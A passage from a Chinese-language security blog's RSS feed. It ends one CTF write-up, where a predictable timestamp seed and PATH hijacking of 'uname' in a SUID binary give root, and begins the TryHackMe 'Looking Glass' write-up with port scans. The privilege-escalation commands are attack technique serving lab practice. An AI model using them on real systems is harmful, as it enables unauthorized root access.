&lt;li&gt;看起來是有用過 pwntools 的遺跡&lt;code&gt;python -c 'import pty; pty.spawn(&amp;quot;/bin/bash&amp;quot;)'&lt;/code&gt;- 增加互動性跑豌豆- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2dcbe-OrSd9vs.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/938de-8u9cFVS.png"&gt;&lt;/li&gt;
&lt;li&gt;找到一個奇妙的，有 suid 的檔案&lt;code&gt;/srv/time-turner/swagger&lt;/code&gt;直接執行- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b422e-aYZMlV9.png"&gt;&lt;/li&gt;
&lt;li&gt;看起來是猜數字遊戲丟進 ida- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/242c9-25JLMPW.png"&gt;&lt;/li&gt;
&lt;li&gt;看起來是用 timestamp 當 random seed&lt;/li&gt;
&lt;li&gt;我們可以自己編譯一個程式，餵入當前時間&lt;code&gt;date +%s ; /srv/time-turner/swagger&lt;/code&gt;- 可以取得當前 timestamp ，並執行程式編譯自己的 C 語言程式，給予指定的 timestamp- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d16eb-61t2bc2.png"&gt;填上去！- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/1f3a6-yZ49WFC.png"&gt;&lt;/li&gt;
&lt;li&gt;成功，發現他會呼叫沒有絕對路徑的 uname所以可以蓋 path- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/1f0ad-ZN3JkvX.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/bin/date +%s ;PATH=/home/hermonine/fakepath:$PATH /srv/time-turner/swagger&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4f23b-vM33O0T.png"&gt;&lt;/li&gt;
&lt;li&gt;就成功 root 了取得 Root Flag- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d93ef-VGKzQVe.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;RME{M@rK-3veRy-hOur-0135d3f8ab9fd5bf}&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Looking Glass (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/08/23/looking-glass-try-hack-me-writeup/</link><pubDate>Mon, 23 Aug 2021 13:05:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/08/23/looking-glass-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/lookingglass"&gt;https://tryhackme.com/room/lookingglass&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;IP : 10.10.150.136&lt;/p&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;掃 port&lt;code&gt;rustscan -a 10.10.150.136 -r 1-65535&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5be68-DaK1Ubs.png"&gt;&lt;/li&gt;
&lt;li&gt;三小 ?&lt;strong&gt;_&lt;/strong&gt;?&lt;/li&gt;
&lt;li&gt;先看看比較特別的 22 port&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ee569-FG3Qh5z.png"&gt;&lt;/li&gt;
&lt;li&gt;也沒啥特別ㄉ&lt;code&gt;rustscan -a 10.10.150.136 -r 1-65535 --accessible | tee rustscan.txt&lt;/code&gt;- 存成檔案用 curl 觀察- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/53e61-v7Ixnui.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/f4045-TsjRobZ.png"&gt;用 nmap 觀察- &lt;code&gt;nmap -sV -p9001,9011,9003,9000,9009,9006,9005,9004,9015,9008,9007,9013,9017,9002,9010,9012,9020,9014,9019,9016,9024,9018,9027,9026,9034,9025,9023,9021,9022,9033,9035,9039,9030,9029,9051,9031,9045,9040,9052,9028,9042,9038,9041,9032,9048,9044,9043,9037,9049,9036,9059,9047,9050,9058,9057,9054,9053,9061,9056,9046,9064,9055,9062,9071,9060,9063,9068,9067,9066,9065,9075,9074,9073,9072,9070,9069,9081,9076,9080,9082,9078,9079,9091,9089,9077,9085,9101,9088,9086,9083,9100,9084,9095,9099,9093,9087,9090,9094,9096,9092,9097,9098,9103,9105,9104,9102,9107,9106,9109,9114,9110,9108,9115,9111,9113,9112,9117,9121,9116,9119,9120,9118,9122,9123,9127,9126,9131,9125,9130,9129,9124,9128,9132,9133,9135,9134,9137,9136,9138,9143,9140,9141,9142,9158,9155,9154,9147,9149,9145,9139,9161,9167,9156,9148,9168,9150,9146,9164,9166,9165,9177,9157,9152,9144,9162,9151,9174,9153,9172,9159,9178,9173,9171,9179,9160,9180,9163,9169,9184,9189,9193,9186,9170,9195,9176,9185,9175,9181,9182,9204,9192,9183,9190,9191,9202,9194,9197,9200,9206,9196,9209,9208,9188,9187,9215,9203,9198,9199,9205,9201,9213,9217,9216,9210,9214,9212,9211,9219,9218,9207,9220,9221,9222,9223,9225,9224,9228,9226,9227,9231,9229,9230,9232,9233,9234,9235,9236,9238,9237,9247,9240,9241,9248,9250,9253,9243,9239,9245,9242,9252,9251,9254,9246,9244,9249,9255,9258,9259,9256,9257,9267,9260,9262,9264,9263,9266,9261,9265,9268,9270,9273,9274,9271,9269,9276,9275,9272,9277,9283,9278,9285,9279,9284,9281,9280,9282,9286,9287,9289,9288,9290,9291,9293,9292,9294,9295,9297,9299,9296,9301,9303,9298,9300,9302,9304,9305,9306,9307,9308,9309,9310,9311,9316,9312,9314,9317,9313,9315,9318,9320,9321,9322,9324,9325,9323,9319,9329,9326,9331,9330,9328,9332,9327,9333,9334,9335,9337,9340,9338,9343,9344,9336,9342,9339,9345,9346,9341,9348,9350,9352,9347,9351,9349,9353,9356,9355,9358,9360,9354,9357,9364,9362,9359,9363,9367,9361,9365,9366,9375,9373,9369,9374,9368,9381,9380,9384,9371,9376,9377,9370,9372,9378,9382,9379,9385,9383,9389,9387,9388,9390,9393,9392,9386,9391,9394,9395,9396,9397,9398,9399,9400,9401,9412,9410,9408,9419,9417,9424,9402,9406,9420,9407,9415,9413,9414,9425,9405,9416,9418,9404,9411,9403,9409,9426,9421,9423,9427,9429,9422,9428,9430,9431,9432,9433,9434,9435,9442,9440,9437,9439,9441,9438,9436,9446,9450,9444,9443,9445,9447,9449,9448,9451,9454,9452,9453,9458,9455,9459,9456,9457,9463,9460,9461,9465,9462,9468,9464,9466,9467,9470,9469,9474,9473,9472,9477,9478,9471,9482,9476,9475,9480,9483,9479,9481,9485,9486,9484,9491,9487,9488,9489,9490,9493,9492,9494,9498,9499,9497,9496,9495,9502,9501,9500,9503,9505,9504,9508,9510,9507,9506,9509,9511,9512,9513,9514,9517,9519,9515,9516,9520,9518,9522,9527,9526,9528,9521,9525,9524,9530,9533,9523,9529,9534,9532,9531,9535,9536,9537,9539,9538,9540,9541,9545,9543,9542,9544,9546,9551,9549,9547,9554,9548,9555,9556,9557,9550,9558,9552,9553,9559,9561,9560,9562,9564,9565,9563,9568,9566,9569,9571,9567,9573,9574,9572,9575,9570,9576,9580,9577,9581,9579,9578,9582,9583,9584,9586,9585,9587,9589,9594,9588,9590,9592,9591,9593,9595,9601,9598,9600,9602,9599,9597,9596,9603,9609,9608,9607,9606,9610,9604,9615,9612,9619,9617,9605,9613,9621,9614,9611,9616,9620,9622,9618,9623,9644,9626,9627,9638,9633,9640,9629,9630,9624,9642,9634,9637,9636,9643,9632,9635,9625,9641,9647,9645,9639,9628,9631,9646,9648,9649,9650,9651,9653,9654,9652,9659,9657,9655,9658,9656,9660,9661,9663,9662,9664,9665,9666,9668,9667,9671,9669,9670,9672,9673,9675,9674,9676,9678,9677,9679,9680,9681,9682,9683,9684,9685,9686,9692,9689,9687,9693,9690,9688,9691,9694,9695,9698,9696,9699,9697,9700,9724,9725,9722,9737,9726,9723,9728,9721,9738,9727,9739,9736,9735,9740,9741,9742,9745,9744,9743,9747,9748,9750,9746,9752,9749,9754,9753,9751,9762,9763,9764,9766,9770,9767,9765,9771,9773,9772,9780,9777,9781,9779,9778,9790,9789,9801,9802,9791,9799,9804,9811,9803,9800,9806,9805,9808,9814,9815,9809,9807,9810,9813,9816,9817,9812,9818,9821,9819,9820,9824,9828,9822,9826,9823,9829,9825,9827,9830,9831,9832,9833,9837,9834,9836,9839,9841,9835,9838,9848,9840,9842,9846,9847,9844,9851,9849,9845,9850,9843,9853,9852,9865,9857,9855,9859,9862,9854,9856,9863,9861,9866,9860,9858,9868,9864,9867,9870,9869,9872,9871,9878,9874,9875,9879,9873,9877,9876,9880,9884,9886,9882,9881,9888,9889,9883,9887,9885,9893,9892,9891,9890,9896,9900,9904,9898,9895,9899,9894,9901,9910,9907,9906,9905,9897,9908,9903,9902,9913,9909,9912,9911,9915,9926,9914,9924,9917,9923,9920,9919,9925,9922,9921,9918,9916,9930,9928,9927,9929,9934,9941,9937,9939,9931,9933,9936,9935,9940,9938,9932,9942,9943,9944,9961,9972,9966,9962,9971,9964,9967,9969,9963,9968,9970,9965,9975,9973,9974,9978,9979,9977,9980,9976,9981,9996,9983,9982,10000,9984,9986,9985,9997,10001,9998,9999,10002,10003,10006,10005,10004,10007,10011,10017,10015,10012,10008,10009,10013,10014,10010,10016,10018,10020,10019,10021,10022,10024,10023,10027,10025,10028,10026,10034,10032,10030,10029,10035,10031,10033,10037,10036,10039,10038,10042,10041,10044,10040,10045,10043,10046,10047,10049,10048,10050,10052,10051,10056,10053,10054,10055,10057,10058,10060,10059,10064,10065,10067,10062,10070,10071,10066,10061,10063,10069,10073,10072,10068,10074,10075,10078,10077,10076,10079,10080,10083,10081,10084,10082,10086,10087,10085,10088,10090,10092,10089,10091,10095,10093,10098,10094,10096,10097,10099,10101,10100,10102,10103,10105,10104,10106,10107,10110,10111,10112,10108,10114,10109,10113,10116,10115,10117,10119,10118,10120,10121,10122,10124,10123,10126,10128,10125,10132,10129,10135,10127,10131,10130,10133,10134,10138,10137,10139,10141,10140,10142,10136,10143,10149,10145,10150,10146,10153,10148,10151,10147,10144,10152,10154,10155,10156,10162,10158,10161,10160,10159,10157,10174,10172,10179,10173,10178,10180,10181,10182,10185,10183,10184,10188,10187,10186,10189,10190,10191,10193,10192,10195,10194,10196,10198,10199,10197,10202,10200,10201,10205,10207,10203,10204,10212,10211,10208,10206,10210,10209,10214,10213,10215,10217,10216,10223,10218,10221,10219,10220,10222,10224,10226,10225,10229,10227,10231,10228,10230,10239,10240,10238,10242,10241,10243,10244,10245,10246,10248,10249,10247,10251,10250,10255,10252,10261,10253,10254,10256,10257,10262,10259,10260,10263,10258,10265,10264,10266,10267,10268,10269,10270,10271,10272,10275,10273,10278,10274,10279,10292,10277,10276,10293,10294,10295,10297,10299,10296,10298,10301,10300,10345,10344,10347,10346,10343,10348,10350,10352,10349,10351,10353,10354,10355,10374,10378,10379,10377,10375,10376,10381,10383,10380,10382,10436,10384,10438,10437,10440,10439,10441,10442,10446,10447,10449,10445,10444,10450,10452,10453,10448,10455,10456,10454,10463,10462,10460,10464,10465,10461,10459,10477,10466,10476,10475,10478,10480,10479,10484,10487,10486,10485,10488,10491,10489,10493,10490,10492,10494,10496,10495,10497,10499,10502,10500,10498,10503,10501,10506,10504,10507,10508,10505,10513,10511,10510,10514,10518,10509,10512,10515,10516,10521,10517,10522,10523,10520,10526,10519,10524,10530,10528,10525,10527,10529,10531,10533,10532,10536,10540,10534,10535,10538,10539,10541,10542,10537,10544,10545,10546,10548,10543,10547,10551,10550,10552,10549,10557,10554,10556,10559,10558,10560,10561,10553,10555,10563,10562,10564,10565,10567,10569,10566,10568,10570,10571,10576,10573,10577,10575,10572,10578,10574,10579,10581,10580,10582,10584,10583,10585,10590,10593,10588,10586,10595,10587,10589,10592,10591,10600,10603,10596,10594,10601,10597,10598,10599,10604,10605,10602,10607,10606,10608,10611,10610,10609,10615,10613,10612,10614,10616,10618,10617,10620,10619,10621,10624,10625,10622,10623,10626,10630,10632,10628,10634,10627,10631,10635,10629,10633,10636,10637,10638,10639,10640,10644,10646,10642,10649,10643,10641,10645,10647,10648,10650,10651,10653,10652,10654,10655,10657,10656,10658,10661,10660,10659,10662,10664,10663,10666,10665,10668,10667,10670,10669,10671,10672,10673,10674,10675,10676,10678,10677,10679,10680,10681,10683,10684,10682,10685,10687,10686,10688,10689,10690,10691,10692,10693,10694,10698,10699,10696,10697,10695,10700,10701,10703,10704,10705,10702,10706,10707,10708,10709,10712,10710,10711,10714,10713,10715,10717,10718,10716,10719,10720,10721,10722,10723,10724,10726,10725,10727,10728,10729,10733,10736,10734,10731,10730,10737,10732,10735,10738,10739,10740,10741,10742,10746,10747,10744,10743,10745,10749,10748,10751,10750,10752,10754,10753,10755,10756,10757,10758,10762,10760,10759,10761,10763,10768,10764,10765,10766,10771,10770,10767,10769,10772,10773,10774,10775,10776,10777,10780,10779,10778,10785,10788,10786,10784,10782,10787,10783,10781,10792,10789,10790,10791,10793,10794,10795,10796,10797,10798,10799,10801,10800,10803,10802,9733,9757,9761,9758,9734,9760,9715,9759,9717,9720,10804,9716,9731,9719,9732,9755,9712,9708,9769,9718,9756,9768,9713,9730,10805,9714,9729,9710,9711,9709,9706,9702,9705,9703,9707,10806,9701,9704,10807,10809,10812,10808,10810,10813,10811,10815,10814,10816,10817,10823,10820,10819,10821,10822,10818,10827,10826,10825,10824,10828,10834,10831,10829,10833,10836,10832,10830,10837,10835,10838,10842,10841,10840,10843,10839,10857,10844,10858,10855,10861,10860,9776,10856,9774,9775,9782,9798,9788,9784,9783,9786,9795,9787,9785,10863,10862,9796,10864,9792,9794,9797,9793,10865,10866,10878,10888,10883,10880,10887,10882,10879,10889,10885,10881,10884,10886,10891,10890,10893,10894,10892,10895,10903,10901,10902,10904,10896,10905,10919,10918,10920,10921,10922,10923,10925,10926,10924,10930,10927,10929,10928,10931,10932,10933,10934,10935,10937,10936,10938,10939,10940,10941,10942,10943,10944,10945,10948,10947,10946,10949,10950,10952,10951,10955,10954,10953,10956,10959,10958,10957,10961,10960,9956,9951,9959,9957,9945,9955,9954,9948,9953,9947,10962,9960,9958,9949,9952,10967,10965,9946,10970,10968,10966,9950,10964,10963,10969,10971,10972,10973,10975,10976,10980,10974,10982,10977,10978,10979,10981,10983,10985,9991,9995,10984,9993,9992,9994,9989,9990,9987,9988,10986,10988,10987,10990,10991,10989,10994,10993,10992,10997,10996,10998,10995,10999,11001,11000,11005,11002,11006,11004,11010,11009,11003,11008,11011,11007,11012,11013,11016,11017,11014,11015,11019,11020,11018,11021,11022,11023,11024,11031,11025,11030,11027,11028,11026,11029,11033,11035,11034,11032,11036,11037,11038,11040,11042,11039,11041,11043,11044,11046,11045,11047,11048,11049,11050,11051,11053,11054,11052,11055,11057,11056,11059,11058,11060,11062,11063,11061,11065,11066,11069,11064,11067,11068,11070,11071,11073,11074,11075,11072,11079,11076,11077,11078,10169,10177,10163,10164,10166,10170,11080,10171,10176,10175,10165,10167,11081,10168,11083,11082,11084,11085,11086,11087,11088,11089,11090,11091,11095,11093,11094,11092,11097,11100,11096,11101,11102,11098,11099,11105,11103,11104,11106,11114,11109,11110,11108,11113,11111,11116,11107,11115,11117,11122,11112,11118,11120,11121,11119,11123,11124,11125,11127,11126,11128,11129,11130,11131,11134,11133,11132,11137,11136,11135,11138,11139,11140,11142,11141,11143,11144,11148,11146,11149,11145,11147,11150,11154,11153,11151,11152,11155,11158,11159,11163,11157,11162,11156,11160,11161,11164,11172,11167,11171,11168,11174,11170,11166,11169,11179,11165,11175,11173,11177,11178,11176,11182,11181,11183,11180,11184,11185,11187,11186,11188,11189,11190,10236,10237,10233,10232,11192,10235,11196,10234,11199,11191,11193,11195,11217,11198,11215,11194,11197,11200,11216,11201,11229,11226,11225,11228,11227,11234,11240,11235,11230,11236,11241,11244,11243,11239,11242,11245,11246,11248,11256,11255,11249,11247,11257,11260,11258,11261,11272,11273,11259,11275,11274,11286,11288,11289,11287,11290,11292,11291,11309,11298,11295,10386,11297,11293,10385,11308,11294,11296,11310,11307,10387,11314,11316,11312,11313,11311,11320,11318,11315,11319,11317,11322,11321,11324,11332,11323,11333,11337,11335,11334,11340,11336,11339,11338,11341,10418,10431,10419,10428,10420,10412,10417,10409,10433,10432,10422,10407,10414,10404,10421,10410,10430,10423,10435,10411,10415,10434,10408,10426,10427,10424,10403,10429,10413,10425,10416,10398,10396,10389,10405,10399,10388,10402,10406,10397,10400,11342,10395,10393,10401,10391,10392,10394,10390,11351,11347,11343,11346,11350,11352,11348,11356,11355,11354,11349,11353,10483,10482,10473,10481,10451,10474,10468,10472,10443,10471,10470,10458,10469,10467,11357,11359,10457,11358,11360,11362,11361,11366,11368,11365,11363,11364,11367,11370,11371,11372,11369,11376,11375,11374,11377,11373,11378,11380,11381,11379,11382,11383,11384,11390,11398,11387,11385,11392,11389,11391,11395,11393,11388,11397,11386,11394,11396,11399,11409,11404,11400,11401,11402,11407,11405,11413,11412,11411,11403,11406,11410,11416,11414,11408,11415,11417,11420,11419,11418,11421,11422,11423,11424,11425,11426,11427,11430,11428,11432,11429,11433,11431,11436,11435,11434,11437,11438,11441,11442,11440,11439,11445,11443,11452,11444,11448,11453,11449,11454,11446,11447,11450,11455,11451,11457,11456,11458,11459,11460,11461,11462,11464,11463,11465,11466,11470,11469,11467,11468,11471,11472,11473,11474,11475,11476,11477,11478,11479,11480,11481,11482,11483,11484,11486,11485,11487,11488,11489,11490,11493,11491,11494,11492,11496,11497,11495,11500,11501,11502,11498,11499,11503,11504,11505,11506,11507,11509,11510,11512,11508,11514,11511,11513,11515,11517,11516,11519,11518,11520,11521,11524,11523,11522,11527,11525,11526,11529,11528,11530,11531,11532,11535,11533,11534,11536,11538,11537,11539,11540,11541,11542,11543,11546,11545,11544,11550,11549,11548,11547,11552,11551,11553,11556,11554,11557,11555,11558,11559,11564,11562,11560,11563,11561,11565,11566,11567,11568,11569,11570,11572,11576,11575,11608,11609,11610,11611,11795,11612,11796,11800,11798,11803,11799,11802,11797,11801,11812,11804,11808,11811,11807,11809,11820,11815,11817,11810,11805,11824,11816,11806,11823,11821,11814,11819,11813,11827,11826,11818,11822,11825,11829,11828,11831,11833,11830,11832,10847,10846,10845,10848,11834,11839,11836,11835,11840,11838,11837,11841,11843,11842,11844,10877,10872,10873,10871,10876,10875,10869,10868,10867,10874,10870,11845,10859,11846,10854,10853,10851,10850,10849,11848,11849,10852,11852,11847,11850,11855,11851,11853,11854,11856,11860,11859,11858,11863,11857,11864,11861,11865,11862,11866,11867,11868,10917,10916,10900,10915,10910,10914,10908,10906,10909,10907,10899,10913,10911,10912,10898,10897,11870,11869,11871,11872,11873,11876,11875,11878,11877,11874,11879,11881,11880,11883,11882,11884,11886,11885,11888,11887,11890,11889,11891,11892,11893,11895,11894,11896,11897,11900,11898,11899,11901,11902,11904,11903,11905,11906,11908,11910,11909,11911,11907,11912,11913,11914,11916,11915,11917,11918,11919,11920,11921,11924,11922,11923,11927,11925,11926,11929,11928,11931,11932,11930,11933,11934,11935,11936,11937,11938,11939,11940,11941,11942,11945,11946,11943,11944,11947,11948,11949,11950,11951,11953,11952,11956,11954,11957,11958,11955,11961,11960,11959,11962,11963,11964,11965,11966,11968,11967,11971,11969,11970,11972,11974,11973,11975,11977,11976,11978,11979,11980,11982,11981,11983,11985,11984,11986,11987,11990,11989,11988,11992,11991,11995,11993,11996,11994,11997,11999,11998,12000,12001,12002,12003,12004,12007,12006,12005,12008,12009,12015,12016,12017,12013,12014,12011,12020,12012,12019,12010,12018,12021,12023,12024,12022,12025,12026,12027,12028,12030,12029,12034,12031,12032,12033,12035,12036,12038,12039,12042,12037,12041,12040,12043,12045,12047,12044,12048,12049,12050,12046,12051,12052,12053,12054,12055,12056,12058,12057,12059,12060,12064,12061,12063,12065,12066,12062,12067,12068,12069,12071,12070,11214,11211,12072,11207,11212,11213,11209,11210,11206,11208,11202,11203,11204,11205,12073,12074,12077,12075,12076,12078,12079,12083,12082,12081,12080,12084,12085,12087,12086,12090,12089,12088,12091,12092,12094,12093,12095,12096,12098,12097,12101,12099,12102,12100,12107,12104,12106,12103,12105,12108,12109,12110,11224,11222,11221,11223,11220,11238,11219,11218,11232,11237,11231,11233,12111,12113,12112,12118,12114,12117,12121,12120,12116,12119,12115,11265,11266,11282,11276,11270,11278,11267,11284,11285,11269,11283,12122,11279,11262,11268,11277,11280,11263,11250,11271,11281,11253,11254,11264,11251,11252,12123,12124,12125,12126,12127,12130,12131,12128,12132,12134,12129,11331,11328,11326,11330,11325,11306,11329,12133,11304,11327,11300,11301,12140,11305,12139,11303,11299,12135,11302,12137,12138,12136,12141,12142,12144,12143,12145,12147,12148,12149,12150,12151,12146,12153,12152,11345,12154,12155,12156,11344,12158,12157,12163,12165,12159,12161,12160,12166,12162,12164,12167,12168,12171,12169,12170,12172,12173,12176,12178,12177,12174,12175,12179,12180,12182,12181,12183,12185,12184,12187,12188,12186,12191,12192,12189,12193,12190,12194,12195,12196,12197,12198,12199,12200,12201,12203,12202,12204,12205,12206,12207,12208,12209,12210,12212,12211,12214,12217,12213,12215,12216,12218,12219,12220,12221,12222,12224,12225,12226,12223,12227,12228,12230,12229,12231,12234,12235,12232,12233,12238,12236,12237,12240,12239,12244,12242,12243,12241,12249,12246,12245,12248,12250,12251,12254,12247,12252,12255,12253,12259,12258,12256,12257,12261,12260,12262,12264,12263,12265,12268,12267,12269,12266,12270,12272,12271,12273,12274,12278,12277,12276,12281,12275,12279,12282,12280,12283,12284,12286,12285,12288,12287,12289,12290,12291,12292,12294,12296,12295,12293,12298,12297,12299,12302,12300,12303,12301,12304,12305,12306,12310,12311,12316,12309,12307,12313,12314,12308,12312,12317,12321,12318,12322,12326,12320,12325,12319,12324,12323,12327,12328,12329,12330,12332,12331,12315,12334,12335,12333,12336,12337,12339,12338,12340,12343,12341,12344,12342,12345,12346,12348,12347,12352,12350,12349,12351,12353,12354,12361,12358,12356,12355,12366,12359,12364,12367,12365,12360,12362,12363,12357,12368,12369,12370,11587,11595,11596,11593,11579,11582,11584,11588,11598,11590,11585,11592,11583,11594,11591,11586,11597,11580,11589,11574,11573,11578,11577,11571,11581,12372,12371,12373,12376,12380,12382,12379,12378,12374,12377,12375,12381,12384,12383,12392,12387,12391,12385,12390,12389,12386,12388,12393,12394,12398,12396,12397,12399,12401,12400,12395,12404,12402,12403,12405,12406,12409,12407,12411,12408,12413,12410,12414,12415,12416,11644,12412,11648,11646,11647,11645,11649,11643,11636,11639,11642,11635,11640,11632,12417,11626,11634,11623,11630,11625,11615,11628,11622,11641,11638,11627,11631,11613,11619,11624,11620,11629,11637,11633,11616,11614,11607,11617,11621,11618,11603,11602,11601,11606,11605,11600,11604,11599,12418,12420,12419,12421,12422,12424,12423,12425,12447,12439,12441,12436,12437,12445,12451,12450,12442,12446,12449,12440,12426,12452,12438,12448,12455,12443,12444,12453,12454,12456,12458,12459,12457,12463,12462,12474,12475,12473,12476,11793,11792,11794,11788,11785,11786,11791,11782,11784,11776,11790,11780,11789,11783,11787,11778,11772,11770,11781,11777,11779,11768,11774,11769,11767,11771,11775,11761,11773,11765,11764,11762,11755,11758,11751,11754,11759,11745,11753,11747,11766,11757,11760,11763,11756,11744,11735,11746,11750,11738,11743,11740,11741,11748,11749,11752,11732,11737,11742,11730,11727,11731,11736,11734,11729,11739,11733,11728,12485,12483,12478,12477,12484,12486,12487,12491,12493,12492,12495,12494,12496,12497,12498,12500,12502,12501,12499,12503,12504,12505,12506,12508,12507,12509,12512,12510,12514,12511,12513,12515,12516,12517,12518,12524,12520,12523,12522,12519,12521,12526,12525,12527,12529,12528,12530,12531,12532,12534,12536,12533,12535,12543,12538,12537,12539,12544,12540,12541,12542,12547,12546,12554,12545,12548,12549,12553,12555,12551,12556,12552,12550,12557,12559,12558,12560,12562,12561,12563,12564,12566,12567,12568,12565,12569,12570,12573,12572,12571,12574,12579,12576,12577,12575,12580,12578,12584,12581,12583,12586,12587,12582,12585,12588,12590,12589,12592,12595,12593,12591,12594,12596,12599,12600,12597,12601,12598,12604,12602,12605,12606,12603,12607,12608,12610,12609,12611,12612,12615,12613,12614,12628,12631,12632,12626,12627,12629,12630,12633,12634,12635,12636,12646,12647,12648,12649,12650,12653,12651,12656,12655,12654,12652,12658,12662,12660,12659,12657,12661,12665,12663,12664,12666,12669,12667,12668,12670,12671,12672,12673,12674,12675,12676,12679,12677,12685,12678,12686,12688,12687,12697,12698,12699,12701,12700,12713,12703,12712,12714,12711,12702,12720,12716,12717,12721,12718,12719,12715,12722,12725,12723,12724,12726,12728,12730,12727,12735,12731,12729,12734,12737,12732,12733,12736,12739,12745,12738,12740,12748,12746,12761,12749,12762,12750,12747,12770,12765,12772,12768,12766,12767,12769,12763,12778,12775,12780,12782,12777,12776,12771,12764,12781,12784,12783,12779,12787,12786,12788,12790,12789,12791,12794,12797,12798,12800,12799,12796,12802,12795,12793,12792,12803,12801,12804,12808,12806,12815,12816,12807,12805,12819,12817,12818,12820,12823,12824,12826,12822,12825,12821,12827,12828,12829,12832,12831,12830,12834,12835,12833,12836,12837,12838,12839,12841,12842,12840,12843,12846,12844,12850,12848,12849,12845,12851,12847,12854,12852,12855,12853,12856,12858,12857,12860,12861,12859,12862,12863,12864,12865,12867,12868,12866,12869,12872,12875,12873,12870,12874,12876,12878,12871,12879,12882,12880,12883,12881,12877,12887,12885,12886,12884,12889,12890,12896,12893,12892,12891,12888,12895,12894,12897,12898,12900,12901,12899,12904,12903,12902,12907,12905,12906,12908,12910,12909,12911,12913,12912,12915,12916,12914,12917,12918,12919,12921,12922,12920,12924,12925,12923,12926,12927,12928,12929,12932,12930,12933,12931,12934,12942,12936,12935,12939,12937,12943,12944,12940,12941,12945,12938,12946,12947,12949,12951,12950,12948,12952,12953,12954,12958,12956,12962,12955,12959,12960,12961,12957,12970,12972,12966,12965,12969,12968,12967,12964,12973,12974,12976,12978,12971,12985,12977,12979,12963,12981,12987,12986,12984,12982,12993,12990,12988,12975,12992,12980,12989,12983,12991,12999,12995,12996,13000,13002,13001,12994,12997,12998,13003,13004,13007,13015,13012,13011,13008,13017,13016,13005,13014,13009,13010,13018,13006,13013,13031,13033,13030,13149,13029,13035,13034,13032,13037,13036,13152,13150,13151,13235,13153,13236,13237,13240,13241,13238,13242,13245,13239,13247,13243,13244,13246,13248,13249,13255,13258,13257,13260,13259,13262,13256,13270,13264,13263,13269,13271,13272,13275,13276,13277,13278,13279,13280,13282,13284,13286,13283,13285,13281,13287,13288,13290,13294,13293,13289,13291,13292,13296,13297,13295,13299,13305,13302,13300,13298,13301,13306,13303,13304,12435,12430,12428,12433,12432,12431,12434,12427,12429,13308,13307,13309,13311,13312,13310,13314,13317,13315,13316,13313,13318,13319,13323,13321,13320,13324,13325,13326,13322,13327,13328,13329,13330,13331,13333,13332,13334,12470,12472,12469,12466,12467,12471,12468,12464,12465,12461,12460,13336,13335,13339,13337,13338,13342,13341,13344,13343,13340,13345,13346,13347,13348,13349,13350,12490,12489,12488,12482,12481,12479,12480,13351,13353,13352,13354,13356,13355,13357,13358,13359,13367,13364,13361,13360,13363,13362,13365,13366,13369,13373,13370,13371,13368,13379,13372,13378,13374,13376,13375,13381,13382,13380,13377,13383,13384,13385,13390,13386,13388,13387,13389,13391,13392,13399,13393,13395,13400,13397,13404,13396,13398,13402,13403,13415,13408,13407,13412,13401,13394,13405,13406,13416,13409,13417,13414,13410,13411,13419,13418,13413,13420,13424,13421,13425,13423,13422,13426,13427,13428,13430,13429,13431,13432,13434,13433,13437,13436,13440,13439,13435,13438,13444,13443,13449,13448,13447,13442,13446,13454,13441,13451,13450,13457,13456,13445,13455,13465,13452,13453,13458,13462,13459,13461,13469,13467,13466,13470,13472,13460,13468,13464,13463,13471,13474,13476,13473,13479,13475,13477,13478,13481,13480,13482,12624,13496,12620,12616,12623,12622,13497,12625,12617,12621,12619,12618,13500,13499,13502,13501,13498,13503,13507,13505,13504,13509,13506,13511,13508,13512,13514,13510,13515,13513,12642,12645,12640,12637,12644,12643,12639,12638,12641,13517,13521,13519,13522,13516,13518,13520,13523,13524,13525,13526,13528,13530,13531,13527,13529,13532,13533,13534,13535,13536,13537,13539,13538,13541,13543,13540,13542,13544,13545,13546,13547,13548,13549,13550,13551,13552,13554,13553,12710,12707,12709,12708,13555,12705,13556,12706,12694,12704,12683,12693,12690,12680,12695,12684,12692,12681,12689,12696,12682,13557,12691,13561,13560,13562,13559,13558,13570,13568,13565,13571,13564,13567,13563,13566,13575,13574,13573,13569,13572,13576,13578,13577,13579,12741,12759,12751,12785,12752,13580,12743,12744,12756,12754,12774,12755,12760,12753,12757,12758,12773,12742,13581,13582,13583,13584,13585,13586,13587,13589,13588,12812,12814,12813,12811,12810,12809,13590,13593,13592,13591,13594,13598,13595,13596,13597,13599,13601,13600,13602,13603,13605,13606,13604,13608,13607,13609,13610,13611,13612,13614,13615,13613,13616,13617,13619,13618,13620,13621,13625,13622,13624,13623,13627,13626,13628,13629,13630,13634,13635,13632,13633,13636,13631,13637,13638,13641,13640,13642,13639,13646,13645,13647,13643,13644,13649,13648,13652,13650,13655,13654,13651,13653,13656,13657,13658,13660,13659,13661,13663,13662,13664,13665,13667,13666,13668,13671,13670,13672,13669,13675,13674,13677,13673,13676,13681,13686,13679,13685,13680,13682,13687,13678,13683,13684,13688,13691,13693,13695,13689,13694,13690,13692,13697,13696,13698,13699,13701